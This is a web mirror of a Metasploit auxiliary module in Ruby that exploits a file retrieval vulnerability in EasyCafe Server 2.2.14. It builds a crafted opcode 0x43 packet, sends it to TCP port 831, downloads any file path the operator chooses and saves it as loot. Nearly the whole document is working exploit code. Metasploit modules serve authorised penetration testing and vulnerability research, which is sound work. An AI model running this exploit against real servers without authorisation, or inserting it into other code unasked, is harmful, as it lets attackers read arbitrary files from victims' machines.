Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
19642 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'EasyCafe Server Remote File Access',

16
        'Description' => %q{

17
          This module exploits a file retrieval vulnerability in

18
          EasyCafe Server. The vulnerability can be triggered by

19
          sending a specially crafted packet (opcode 0x43) to the

20
          831/TCP port.

21
          This module has been successfully tested on EasyCafe Server

22
          version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3

23
          and Windows 7 SP1.

24
          Note that the server will throw a popup messagebox if the

25
          specified file does not exist.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'R-73eN', # Vulnerability Discovery

30
          'bcoles' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'EDB', '39102' ]

34
        ],

35
        'Notes' => {

36
          'Reliability' => UNKNOWN_RELIABILITY,

37
          'Stability' => UNKNOWN_STABILITY,

38
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        Opt::RPORT(831),

46
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])

47
      ]

48
    )

49
  end

50


51
  def get_file

52
    res = sock.get_once

53
    unless res

54
      print_error("Unable to retrieve file due to a timeout.")

55
      return

56
    end

57


58
    unless res.length == 261

59
      print_error("Received a response of an invalid size.")

60
      return

61
    end

62


63
    file_size = res.unpack('@256V')[0]

64
    contents = ''

65
    while contents.length < file_size

66
      contents << sock.get_once

67
    end

68


69
    print_good("File retrieved successfully (#{contents.length} bytes)!")

70
    contents

71
  end

72


73
  def run_host(ip)

74
    file_path = datastore['FILEPATH']

75
    if file_path.length > 67

76
      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")

77
      return

78
    end

79


80
    packet = "\x43"

81
    packet << file_path

82
    packet << "\x00" * (255 - file_path.length)

83
    packet << "\x01\x00\x00\x00\x01"

84


85
    vprint_status("Sending request (#{packet.length} bytes)")

86
    connect

87
    sock.put(packet)

88


89
    contents = get_file

90
    disconnect

91
    return if contents.nil?

92


93
    path = store_loot(

94
      'easycafe_server',

95
      'application/octet-stream',

96
      ip,

97
      contents,

98
      File.basename(file_path)

99
    )

100
    print_status("File saved in: #{path}")

101
  end

102
end

103


104